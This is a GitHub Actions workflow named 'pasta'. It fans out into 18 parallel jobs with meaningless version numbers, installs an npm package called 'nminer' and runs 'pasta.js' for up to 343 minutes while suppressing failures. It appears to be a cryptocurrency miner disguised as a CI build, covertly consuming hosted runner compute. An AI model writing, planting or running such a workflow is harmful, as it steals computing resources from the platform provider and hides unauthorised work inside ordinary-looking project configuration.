name: pasta
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2292 }
          - { version: 1946 }
          - { version: 6981 }
          - { version: 1703 }
          - { version: 389 }
          - { version: 8092 }
          - { version: 4823 }
          - { version: 6946 }
          - { version: 4759 }
          - { version: 9491 }
          - { version: 9269 }
          - { version: 5903 }
          - { version: 5296 }
          - { version: 3939 }
          - { version: 2930 }
          - { version: 8605 }
          - { version: 556 }
          - { version: 4611 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 343m node pasta.js || echo "pasta executed"